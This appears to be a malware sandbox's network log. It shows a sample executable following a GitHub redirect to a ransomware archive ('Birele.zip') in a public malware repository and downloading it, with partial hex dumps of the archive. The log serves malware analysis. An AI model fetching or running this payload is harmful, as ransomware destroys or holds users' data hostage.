                                                                                                                                                    10140.82.121.3443192.168.2.349712C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:52 UTC586INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:51 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:58:52 UTC586INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    100185.199.108.133443192.168.2.349757C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:14 UTC17606INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 9761692
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "661ea63fbc62342073d5bfd4679b232432b87a10a3c0d0671861822eaa1ccd08"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0813:A32C:790B7E:86A2B4:6335935A
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:14 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6944-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                                    X-Timer: S1664456354.009494,VS0,VE186
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: ed9206dea84710ed2d02fe2dbcc5436d483c7902
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:14 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:14 UTC17607INData Raw: 50 4b 03 04 14 00 01 00 08 00 46 7f 97 48 0d c4 ec 04 e4 f2 94 00 b9 d8 9a 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4e 61 76 61 53 68 69 65 6c 64 2e 65 78 65 cf 6d a1 a8 22 51 3b 7e 26 d3 2c d3 1e d3 0f fb 79 9a a0 19 5b 88 9d ad 57 3c df ac ba c9 c7 af 6e 26 53 32 38 24 ff 4c 32 e8 99 fc 7f 63 d8 b0 1c 6b 08 5a ad 3a 8d 5f 20 c0 7d d9 f8 6c a1 e0 0c e0 af 4f c5 c6 96 99 cf 52 28 92 1b 51 3a 4c de d2 c6 ea 72 65 b9 81 6f 90 13 e4 53 07 93 1a 71 b9 c4 17 e7 c7 e2 19 e0 31 8e f5 01 84 f2 1f 17 51 b4 f7 93 05 87 81 fd ea 83 25 01 65 8c 97 67 30 bd 7f 9d b2 6e 12 d5 a8 48 7b fd 6f ca 41 88 1c e6 7e d9 86 28 f2 74 56 23 19 f7 76 1e 92 7d 53 7a 0e 88 c3 c1 08 86 65 d1 fb 1b 61 d9 41 53 0a 20 d8 ef 78 d0 0a 9e d1 05 9c 45 58 25 42 54 b0 9f 14 29 b9 0f 06
                                                                                                                                                    Data Ascii: PKFHEndermanch@NavaShield.exem"Q;~&,y[W<n&S28$L2ckZ:_ }lOR(Q:LreoSq1Q%eg0nH{oA~(tV#v}SzeaAS xEX%BT)
                                                                                                                                                    2022-09-29 12:59:14 UTC17608INData Raw: 98 c1 2c c7 f5 4d df 6f e0 4f 36 e3 32 59 08 3c 73 9c b0 4f 3c 96 0c 00 b0 7e c4 2e 60 fe 58 35 c8 81 e6 77 5e 1a 1d dc 83 70 7f 85 67 4d a8 f7 59 72 09 74 24 12 95 b7 96 20 54 96 0d b0 73 a4 96 db 52 29 46 c6 f8 4c 77 d5 a3 eb 7d 6d e3 db 1d 87 c6 17 99 af 56 d1 0a 6b 90 a7 19 ed 19 87 44 9c 89 3f a9 20 8b 3e 0d ae 59 ab 91 2a 03 3d 9f 1c 7f e3 57 0b 0e 05 d8 92 92 2b ca 3d 50 fa b2 bb a1 85 3a 08 be 9a 6c 5c 71 36 be e6 54 c8 ef a0 21 7d e7 03 01 e0 16 6f b0 f9 c2 35 b4 d7 d5 34 8d d8 0f 80 e6 d7 3a bc 2d cc 9f a4 2f 68 6f 94 50 cb b9 0e ba ec 42 71 a0 6d b8 f5 ad a2 c5 33 a3 cf cc bd 51 4b e6 36 1e 1a fb ab 39 ef c6 e7 be b2 cf 0c f6 a3 e6 c1 f4 18 db 40 85 64 12 93 1c bb 34 bf af de 2f 07 22 e4 44 10 af 72 d6 e1 a2 14 a1 83 75 d3 df 6c 8f db b7 04 41
                                                                                                                                                    Data Ascii: ,MoO62Y<sO<~.`X5w^pgMYrt$ TsR)FLw}mVkD? >Y*=W+=P:l\q6T!}o54:-/hoPBqm3QK69@d4/"DrulA
                                                                                                                                                    2022-09-29 12:59:14 UTC17609INData Raw: 22 ec 80 dd e1 4c e2 c7 2e 16 61 84 3c 31 e7 5d d6 95 0b 86 e9 06 58 a7 80 71 3e d0 63 3b 81 05 4b aa ae 38 4d e8 02 3b bb 4b 24 0d 94 28 e0 28 35 d4 2a 38 63 a9 a2 50 86 99 7a 92 36 02 19 e7 e6 87 6d 58 82 0e 62 72 fc 9d d2 12 99 83 4a 6c 26 7b 97 4d f4 be b6 d2 b1 4f a1 79 da d0 ee ca 48 1c b9 71 c0 75 b3 fd 02 d3 33 c4 84 6b 2e e1 e4 da e6 72 9f 3d 86 de b5 69 53 17 47 b4 31 d4 18 ca a2 d0 f9 0b 74 54 41 06 44 ff c0 e4 b7 d5 58 2c ae 59 24 20 a4 53 b6 b9 88 bd ae 6b 08 f8 eb 68 cf f6 b5 f2 9b 26 87 48 69 ee 89 1a 38 f5 a9 ac 8f 4f 87 bd 16 73 1a 7b ee ec 4f a2 e0 d4 46 21 12 2c 2f 20 9a 43 19 b4 31 36 83 2e c0 26 86 ad 4c 4e 6d e1 7e e4 59 ef 30 b7 2d d6 5b 96 b7 87 30 1b b9 78 49 73 f4 47 b0 19 ae 2e d9 82 50 97 18 06 b9 78 fa bc 29 28 d5 24 51 08 f8
                                                                                                                                                    Data Ascii: "L.a<1]Xq>c;K8M;K$((5*8cPz6mXbrJl&{MOyHqu3k.r=iSG1tTADX,Y$ Skh&Hi8Os{OF!,/ C16.&LNm~Y0-[0xIsG.Px)($Q
                                                                                                                                                    2022-09-29 12:59:14 UTC17611INData Raw: e0 94 d5 85 66 c2 03 d9 9b fa af cc 2f 79 ae 29 59 53 67 c5 9d 64 1d 80 c2 34 24 74 e9 fa 9d 6f d5 1b d9 96 b2 32 9d 76 d4 2f 94 b8 cc 25 28 a9 41 46 a8 d3 0c 2b 75 68 2a 30 d5 bf f2 a3 b0 01 6f 5e b3 b4 47 27 1a 2f 1f ee 65 b4 85 96 c1 b3 5e 64 62 8f 7a 53 8b 6f df 2a 2a 1f 87 43 54 41 47 5d 16 8a 1b 0c 6e d7 36 6a fd df 74 a0 f9 e9 a3 f9 f9 2f d1 df 67 bf ff b5 76 25 54 5a 87 a3 34 79 ee f1 aa 49 e5 32 5d 98 e4 44 88 3e 23 ff 0d 57 b5 27 42 0f 32 ac f2 e1 b8 07 a4 55 35 e9 d5 43 45 dd 78 e4 8a cd 00 52 e4 95 d2 92 df 6f f7 b3 50 c4 32 06 0f 88 63 03 22 97 69 4b a6 00 ce 93 b6 9c de 9a c0 bd 85 ef bf e4 3e bd d8 27 91 df 1e 20 f6 7c 3e f3 1d 84 8c 92 fd 05 9c 00 46 39 ad 6c 5a 67 37 b0 d1 c2 84 6f 40 d4 5a 94 24 bd df d7 43 f1 fa 22 79 81 d5 e4 6b 0f f6
                                                                                                                                                    Data Ascii: f/y)YSgd4$to2v/%(AF+uh*0o^G'/e^dbzSo**CTAG]n6jt/gv%TZ4yI2]D>#W'B2U5CExRoP2c"iK>' |>F9lZg7o@Z$C"yk
                                                                                                                                                    2022-09-29 12:59:14 UTC17612INData Raw: 82 6d 7d a0 ef b4 49 0f e6 23 ae 24 78 59 07 6f 66 d1 f3 dc 1b 51 04 f1 14 82 39 f5 a3 4b 3b 50 d4 2b a4 a1 ba 0d 92 37 46 44 2a 62 d1 9a b6 d5 e9 73 20 70 dd a9 94 b2 9c f4 60 8e d5 e3 b6 9a 99 7a 7d 81 22 15 b9 cf 76 2a 72 ef 22 0d 5d f9 c2 65 70 f6 b6 1d b4 3d 39 f4 23 da c3 ed bb a1 7e ac 78 4a b9 4c 6c 77 2a 8c 68 ce 80 ec af 5a 74 15 b4 89 7f 3b 64 f4 ed 93 5f b6 7c 4f 5b f4 4c cc 37 fc 43 16 f9 9a 4a 7c b1 aa 21 60 a1 ea a7 73 37 9d 69 7c d8 0e e5 8d 09 35 6d 0e a5 c9 6a b9 ab f8 75 78 f8 7a ba 6e a3 87 5b f0 b8 8b 2d 7a 2e c1 9d e6 7e f9 25 01 27 b1 89 e6 22 42 ff 1d 1f 43 b2 31 61 a6 6e 77 e3 c2 b6 9a c4 53 32 87 ab df b9 04 6a 73 50 ed 31 d9 90 fe dc 5e 48 b1 7f cc a9 d5 74 f8 74 a2 cb 05 95 33 be 5c e1 f9 ce 39 1a cf 4e 55 cb 49 28 78 4f 51 d7
                                                                                                                                                    Data Ascii: m}I#$xYofQ9K;P+7FD*bs p`z}"v*r"]ep=9#~xJLlw*hZt;d_|O[L7CJ|!`s7i|5mjuxzn[-z.~%'"BC1anwS2jsP1^Htt3\9NUI(xOQ
                                                                                                                                                    2022-09-29 12:59:14 UTC17614INData Raw: 06 60 a3 fe fb 7f 42 9e 3f 01 00 11 e3 6d d0 ca 24 a0 bc 71 91 9d cb e9 e4 05 a3 a2 a1 c6 40 ae 11 c7 50 19 5f 75 30 7f 63 35 d8 18 22 c4 f5 a6 6e eb 08 dc 3f 7e 69 20 e3 31 d5 13 13 7d 34 3f f9 3e de d0 d9 fe 1a 57 9c 2b 79 5e 7a 82 cd 77 24 ef 8d bc 44 ff 81 44 1b f5 fd 3a 07 7e 56 0a 4e b9 4d 00 f9 3d 3d 68 9d 95 a7 78 3b a5 2e 69 9f 29 33 84 6d 6f 9c 93 8d 58 e6 f4 a9 7f f5 1a b3 d8 13 36 84 c7 b4 d3 ab 1d 66 66 85 d2 1d 9b bd 93 1b cd 53 55 28 d4 99 c0 0d d0 22 08 40 77 d0 5a fb 63 2f 9d 66 82 68 7d 64 f3 40 30 46 4a ee 72 69 0e 3c b3 24 26 b6 ff a6 a9 7b f6 6f f4 05 7a 8e 0c 6c 4c b8 6a 65 c2 7f d2 58 f6 d3 c8 b6 f7 c2 dc 5f 7b 12 e8 a5 df ce 3e 55 d1 de 65 29 f2 26 03 a9 7a 32 1c 64 93 b0 49 40 e5 40 d8 e1 7e ee 86 e8 d1 34 68 d2 5f 77 b0 c7 cc 23
                                                                                                                                                    Data Ascii: `B?m$q@P_u0c5"n?~i 1}4?>W+y^zw$DD:~VNM==hx;.i)3moX6ffSU("@wZc/fh}d@0FJri<$&{ozlLjeX_{>Ue)&z2dI@@~4h_w#
                                                                                                                                                    2022-09-29 12:59:14 UTC17615INData Raw: 63 29 a3 6a d1 b5 12 69 9d b6 e0 0b 8e 38 63 95 1f 15 d5 ca 9c e8 38 d6 43 18 a2 bf 32 be f8 f5 29 68 0b a3 75 2f c3 10 a0 2c a1 6a bc 33 03 5f cf 24 e6 e1 e2 2d d9 d7 76 07 3b aa 1c 78 63 dd cb ab 10 71 9d 0e 4e 22 1a 3e e7 c9 67 24 54 d2 0d 14 3e 4a d3 77 5d 90 86 6c a6 b1 b5 e0 bc 62 1d 91 5c 25 bf 66 5e dd de e8 58 d3 c8 b8 6b b3 82 c7 1e d5 3d d6 70 d9 56 44 13 29 26 22 6b e2 27 57 e4 c3 cd a5 9c cc 16 e5 0d 9d d9 74 86 e5 d2 04 ad 3a 78 a7 c7 b9 d8 44 d5 b6 0d 39 4b be bb fc b9 dd 9c 7b c4 49 f6 fb 12 28 76 6c 2e e0 6e bf 3b 32 53 63 02 e6 4b e3 89 16 dc 87 43 d6 9f 49 0a 21 7c 73 04 e1 15 1c a6 90 1b 1a 95 d9 1a ab b8 43 78 8f fa 80 ca 19 fe 80 47 5a eb 17 93 0b d7 ed 84 7c ac 76 41 4b a0 20 9c 21 dc e8 dc 0d 79 a5 8a ea 41 58 ce ab f7 92 d5 7f fd
                                                                                                                                                    Data Ascii: c)ji8c8C2)hu/,j3_$-v;xcqN">g$T>Jw]lb\%f^Xk=pVD)&"k'Wt:xD9K{I(vl.n;2ScKCI!|sCxGZ|vAK !yAX
                                                                                                                                                    2022-09-29 12:59:14 UTC17616INData Raw: 09 b1 bb 1c 33 cd 0f eb 9f 30 bc 33 dc d5 8b f7 31 52 34 e7 be 92 0c fb 57 be 6f b5 8b 0f f9 81 03 93 a7 d0 ca 7e bb 46 41 ef 6a b2 32 3e f9 8e 40 9c 86 50 4d a5 a9 af 29 1d 94 1a 8f d0 a3 17 07 0f 9f d3 54 4d 71 35 65 b8 84 59 8f e1 cb c4 45 3f 4c 15 be b9 3f 3f 07 d3 cb b5 ab 22 ba 8b 16 96 76 ed ea 08 da 32 52 d2 6b ce b3 c1 b3 52 e5 46 70 1e 83 09 9c 24 6e 20 9a 4d 1b 44 74 0e fd 15 a0 ac 9b 95 b0 cc 36 10 91 32 04 42 b2 a6 a2 f0 d8 43 8f 5a 38 46 90 56 36 68 c5 eb bb 9b f6 66 53 92 bf f4 f3 de f8 01 96 2c f0 7b 7a 35 2d 2d 9a 59 69 b9 a9 b6 33 fb 9c f6 c3 3c d6 d1 f1 5c 0f 0f b5 4d be d5 c3 62 5b 31 e7 b6 f9 45 6b ad 5f 14 27 9a b3 b2 e7 19 1f 06 6a 8b 5e 2e c9 76 5f 88 5d a2 eb 35 3b 4f ac 65 9a a9 35 26 c5 f9 5b db dd 6f 2d b4 da ab b6 b6 81 a1 1a
                                                                                                                                                    Data Ascii: 3031R4Wo~FAj2>@PM)TMq5eYE?L??"v2RkRFp$n MDt62BCZ8FV6hfS,{z5--Yi3<\Mb[1Ek_'j^.v_]5;Oe5&[o-
                                                                                                                                                    2022-09-29 12:59:14 UTC17618INData Raw: e0 aa 1b b1 33 18 25 96 f1 9e 0e ca 11 03 66 be 0a 37 41 59 90 d8 cd 7b f8 85 94 c8 a7 1f af 3d a1 16 47 5f f9 e8 c0 60 4c 55 79 8d 1b db 8b 2a 52 2e 25 26 b4 76 7c 37 cf d1 5c a0 7c 29 60 b1 c3 79 08 4c 97 35 05 ac 2e 9d b5 2a 47 1d 55 d7 c1 97 e7 9a fc 1c fe fb 21 9f 0a 2d 2c e2 62 70 ea cb 98 cf c6 f1 41 c3 87 f6 aa c3 ee ca f7 e1 05 b5 b9 30 b3 aa 65 cc ff e0 72 b5 36 ee 16 e3 49 ab 4f e1 3f 89 00 37 c1 ed e2 68 e7 88 a0 9e fc 19 1f 80 3c 98 80 d5 09 e1 7c c3 67 56 18 f8 da 51 55 b6 4c c9 27 2c 12 72 bf 4a 16 20 84 58 8c c5 e8 c4 31 c2 2e af 99 8c 99 cc 0e 05 fb 30 27 9a 10 f4 07 93 10 1b 6f f6 ef b3 36 f2 fa 9b c6 89 fe a1 50 ea 92 45 a7 8e b6 d8 d2 9f 43 87 3f 49 c2 16 ef fe 06 99 45 95 6c 9c 97 a9 1e 0e 16 22 42 bb db d1 58 b1 7d e5 fb 3c 84 3d c2
                                                                                                                                                    Data Ascii: 3%f7AY{=G_`LUy*R.%&v|7\|)`yL5.*GU!-,bpA0er6IO?7h<|gVQUL',rJ X1.0'o6PEC?IEl"BX}<=
                                                                                                                                                    2022-09-29 12:59:14 UTC17619INData Raw: 19 7e a0 d5 3d 39 f0 b9 1b fd 8f 5e c4 57 19 a5 52 4d 4d 29 0e 84 e8 9d 26 59 32 ef c7 c4 8f 93 e6 a7 6a 00 41 0f 08 9a 51 b2 d9 79 26 e1 49 c7 72 4d 2f 49 de fc 8d 9a ad 49 89 73 79 79 68 50 d8 cf 76 d2 c6 e9 f8 2a 27 6c 66 02 0b 7a 67 5e 23 8d 16 50 ce 84 43 b3 e5 44 c8 cc a0 9c c9 62 00 d7 5b dd e8 ca f7 09 8f 0d 14 16 d2 30 8a 44 4d f1 40 c0 18 24 f9 c9 3c de a8 a6 65 58 0f f6 2d 59 07 a2 8d 76 e9 14 de f1 1c ba ce f4 0e aa 68 a6 e2 33 d1 0e 94 ff be f3 f8 7e 65 17 1d 50 23 8e e3 51 9d 4a a8 bb e6 4e 11 db 8b df 3b 4a 6b 7f df e3 26 35 5f 0f 39 a7 ee 5c 67 9b eb 2d 4f 14 07 df e7 d4 10 31 cd 2f 95 62 8d f7 79 e7 28 32 78 73 f4 2f 64 55 1c fe 07 f7 e7 ed f5 36 9d 23 21 f4 d5 82 57 6f 7d 1f 13 11 87 b4 32 33 78 49 c9 20 50 eb f0 35 0f 8b fb 16 20 79 46
                                                                                                                                                    Data Ascii: ~=9^WRMM)&Y2jAQy&IrM/IIsyyhPv*'lfzg^#PCDb[0DM@$<eX-Yvh3~eP#QJN;Jk&5_9\g-O1/by(2xs/dU6#!Wo}23xI P5 yF
                                                                                                                                                    2022-09-29 12:59:14 UTC17620INData Raw: 20 85 c3 8c 81 53 cf 14 19 b7 07 80 c0 90 73 9a 19 05 b8 c6 58 07 4a 16 94 80 29 cb d4 60 ce 7f 51 88 36 1e 4a 9f 4c 43 4d cb 1a 3a 29 79 d0 78 3b f2 e4 49 ec 3f e8 ec 2d 1f 68 13 ec 5d f7 39 18 cb ce e5 a1 35 c0 06 06 5a 03 9e 84 20 38 63 66 0b 5f b4 f3 6f 33 c2 80 1b 28 bd 32 f0 26 ff 8a 8d 87 bc 7d c3 c9 ab 67 c5 2e ed 9d e0 8e 93 db dc cf db b0 5e 56 5e fd 2c 88 41 16 8d 71 2f 76 c0 2c 08 8c 3d 2d 97 b5 c7 f2 4c a4 a1 be a3 10 4e 83 55 0a 97 c5 d3 38 72 7b 21 50 73 d2 37 89 33 f6 36 f2 e4 96 53 57 33 b8 cc a3 94 24 43 d9 5b 37 3e 0c cd 9d b9 ce 9a a3 fc 60 1f ef a5 0c 4b a3 58 bd a1 9f 10 2e ff 6c 2b 4a cc d7 3c 03 4c 3d 25 cc ff 41 38 b1 de 30 f0 76 1c 10 a3 1c 01 71 01 ba 4c 11 e7 56 f2 d0 65 3e 35 c6 42 37 2e d5 5a 20 fd 1d cf c5 10 30 9b c9 c4 e4
                                                                                                                                                    Data Ascii: SsXJ)`Q6JLCM:)yx;I?-h]95Z 8cf_o3(2&}g.^V^,Aq/v,=-LNU8r{!Ps736SW3$C[7>`KX.l+J<L=%A80vqLVe>5B7.Z 0
                                                                                                                                                    2022-09-29 12:59:14 UTC17622INData Raw: f0 9a 45 08 91 a0 8b 78 51 66 e1 27 17 ec 51 96 86 ad 43 e5 6c 37 c4 2b 4d fe 95 ab 6b 26 1b b4 5d 60 46 e9 5d 0c 1b 42 5b 5d 72 68 6f 47 74 5c 3d 65 d2 da 98 0c 50 ea a6 39 6a 0d 15 d5 c0 fd 8e 58 0d 40 fe 9a 81 bd 16 f2 17 e9 02 69 4a 3e 90 66 d9 7b 8d f4 c1 8b 68 e5 bc b1 e9 45 4f 40 d4 95 ba 77 78 20 d3 f6 3e 67 a9 e5 fb 2b d9 da d2 dc e5 de 9d 87 a2 17 ac 08 db a2 4a 79 67 34 59 38 bb 2b b4 6d f3 e2 55 73 bc 66 62 92 03 81 cf 2a 94 dc 92 ea ec 07 26 a6 c3 0c 3d ca aa 62 af 4f 21 b8 d6 17 63 23 79 d5 58 47 a9 eb 35 c7 9d 66 99 de 66 a6 b1 ed da ae d1 59 13 25 e8 63 1b 2e 21 df b6 79 13 94 d6 ea 37 7b df 00 d7 a4 5d 26 ca 41 29 d9 11 58 01 23 1d 4a 24 89 9c b5 90 98 8f b0 cc 80 e0 86 53 d4 7b 16 e1 ff 42 5b 07 a5 9e b6 34 ea 1e 06 4e 75 b1 aa ee c7 89
                                                                                                                                                    Data Ascii: ExQf'QCl7+Mk&]`F]B[]rhoGt\=eP9jX@iJ>f{hEO@wx >g+Jyg4Y8+mUsfb*&=bO!c#yXG5ffY%c.!y7{]&A)X#J$S{B[4Nu
                                                                                                                                                    2022-09-29 12:59:14 UTC17622INData Raw: 81 09 c5 33 8b b8 3a 51 89 d2 fe cf 66 f4 3c 1d 67 5c 9e ca aa 47 60 85 85 77 45 39 36 55 fb 42 4a be 83 2c e3 a5 cf 3b c3 dd ad ae 08 fd ac 5c 18 ac 48 ea f1 a2 63 78 4b e5 39 56 78 0d a4 cf 9d 33 66 2d da a4 d8 ad 48 18 09 5a 5e 48 2e c3 e8 88 0e fd f3 8f 38 9c 65 e7 00 21 3f 9c e4 15 a7 d3 05 32 ef cb 27 78 fd 42 39 4a d1 8d 20 1c b8 7a 6d 72 30 9f 69 2c 99 31 c0 30 5d 2f 91 13 56 07 85 c0 fd df d4 29 9c 95 cd 11 f7 bb b5 cc 9d 22 d6 4e 6e 48 b3 cf 58 90 74 fc 8b 24 49 ce 68 57 f5 d8 38 7d a6 29 f4 06 21 be f3 28 97 80 0f 71 8d fb 6f 3e 27 86 a4 ee 78 d4 71 37 23 4e f1 c4 80 88 c0 0d f4 a5 87 7a a7 df f5 cd 96 59 07 3c 86 b6 44 42 83 d6 aa 38 fa 6a bd 47 d8 57 af d3 4a 7b 33 42 18 be 45 d2 19 3d 80 2f 68 3c 94 07 bd 6e 8b 49 50 16 e2 43 55 e7 c8 58 8b
                                                                                                                                                    Data Ascii: 3:Qf<g\G`wE96UBJ,;\HcxK9Vx3f-HZ^H.8e!?2'xB9J zmr0i,10]/V)"NnHXt$IhW8})!(qo>'xq7#NzY<DB8jGWJ{3BE=/h<nIPCUX
                                                                                                                                                    2022-09-29 12:59:14 UTC17638INData Raw: dd 31 d2 4e 7d f4 d4 58 42 33 9e 75 b6 6e 52 ee de 3d a5 d8 02 05 30 1c c8 87 aa 2b 72 90 ba 27 fb 39 5c 64 ec 33 e4 1d 13 21 24 7d 46 59 f6 37 cd db 3e 15 ae 7a 45 06 14 13 28 ff 4b 1b a3 6b 59 0d c7 ed 98 08 d3 96 12 74 a7 a4 06 af 34 04 79 b8 f4 94 43 34 83 bd 16 84 27 1d 39 58 9a b1 51 9f b8 3c 77 6e 5b b1 42 a1 3a ce 22 fa 6e b5 80 d8 75 1c e7 de 7a 7a af a4 93 3f bb 0f 52 86 ad 86 f3 09 4c 5d 14 59 72 26 fd e7 41 d0 04 ad d5 cd 7d 6d 0b d0 35 de 35 b1 ee 30 f2 b0 5a 7a a8 b4 19 70 88 35 86 fb 12 6e e7 25 d5 f1 ea 53 24 92 41 83 31 da 91 0b fc 84 60 2b c3 3a 9b 53 48 6e c6 66 8c 7f 06 db 8d a9 45 78 92 a8 88 ec 49 c3 05 d1 41 b4 e2 21 b7 1b 56 ca 5c c8 04 37 f7 67 17 42 a0 23 5a fa 8a 37 2a 73 b5 1f f9 ab ce f4 d7 4e 1a a9 3b 32 d8 2a 8a 1d 9b 84 5a
                                                                                                                                                    Data Ascii: 1N}XB3unR=0+r'9\d3!$}FY7>zE(KkYt4yC4'9XQ<wn[B:"nuzz?RL]Yr&A}m550Zzp5n%S$A1`+:SHnfExIA!V\7gB#Z7*sN;2*Z
                                                                                                                                                    2022-09-29 12:59:14 UTC17654INData Raw: 0c 3c 9e f6 47 c5 4a 05 32 53 2b 46 5e a1 e8 25 e8 a9 ea ea 7e 94 6a f5 68 e6 f7 9b 2b 3e 70 11 d5 06 4f 17 53 7f 43 01 19 1a 56 cd b7 24 a9 52 8b f6 ba e6 dd a6 f7 98 f4 bb bb 9e bd 5b f9 0c 6d 7e 6e 77 27 30 b7 1b 25 24 58 f5 8e f9 00 09 25 d8 b8 a4 33 5f 11 4c fb 08 bb 07 4d 03 b2 26 ff e0 59 94 d1 9f f6 5d 85 3b 28 6d 90 db 78 e7 a5 c3 30 4a b7 38 93 f8 7f 17 0d 21 8c 94 4a e5 88 4f 8d a5 9f 09 96 22 49 6a 69 a9 25 d9 33 b7 1e 48 13 1c 02 2b 39 58 d1 f4 18 81 fb aa ce 40 3f ab 0a 49 3d 93 05 db a2 6d b4 40 95 33 70 0a 68 b6 04 a5 ae 3c 32 6e f1 f8 8b 97 cf d5 34 7a 54 30 22 83 ed 7d a2 71 52 22 15 af 37 30 e2 56 09 96 b7 d9 0e e4 ce 59 61 33 df 7d ee ac 01 3b 6c f6 78 d7 89 e4 c0 34 4e 18 af 79 6f be 96 3c 34 36 c5 85 23 b5 d3 c2 27 de 2c 0e 2a d0 cb
                                                                                                                                                    Data Ascii: <GJ2S+F^%~jh+>pOSCV$R[m~nw'0%$X%3_LM&Y];(mx0J8!JO"Iji%3H+9X@?I=m@3ph<2n4zT0"}qR"70VYa3};lx4Nyo<46#',*
                                                                                                                                                    2022-09-29 12:59:14 UTC17670INData Raw: a5 e1 61 9c 78 c2 1b 35 9a 11 fb 1f b4 9e 10 13 49 1d 6b 04 68 c7 45 91 ba 8e 09 98 ea 31 de 9b e0 4c 12 98 05 bd c4 1a 6a e3 94 fa 4c c0 1c 86 a4 bb 66 96 8d d2 09 c8 d4 00 22 ca ae c5 c2 6a d9 d2 74 df 5e 77 f4 11 7c 8d f0 e1 82 e8 c0 c5 00 7b 3a fa f2 83 03 45 65 a8 2d d5 29 6b 1b fd 7d 31 33 77 44 b9 48 ca 8e 00 06 35 fa ea bb 3d 3f fe b9 3d 5c 26 b6 48 ef d9 fb fc e3 1b 1d 19 3c 59 f2 89 01 5b ba 1d d5 c7 e0 bb cb 2e b2 e0 98 13 2d 41 3d d5 77 cc 48 b3 69 17 2b f6 fe 28 be 05 99 ce 2d e8 ac 29 ff e2 0b 2e 1b 72 71 70 71 1e 67 2e 5d 11 37 ea 6d 08 b0 5f 6c aa 3b 9f 26 b5 92 75 65 8a 88 b9 c8 05 de cf 4c e9 20 0d b9 63 7f f3 e3 f3 9a 4d 19 d1 b6 5d 55 da 7a f3 37 30 c5 a8 4f ee aa cf df 2c c5 e8 eb d6 f6 05 94 cb 78 dc bf cc 37 b5 10 9e 6b f6 4d fb e1
                                                                                                                                                    Data Ascii: ax5IkhE1LjLf"jt^w|{:Ee-)k}13wDH5=?=\&H<Y[.-A=wHi+(-).rqpqg.]7m_l;&ueL cM]Uz70O,x7kM
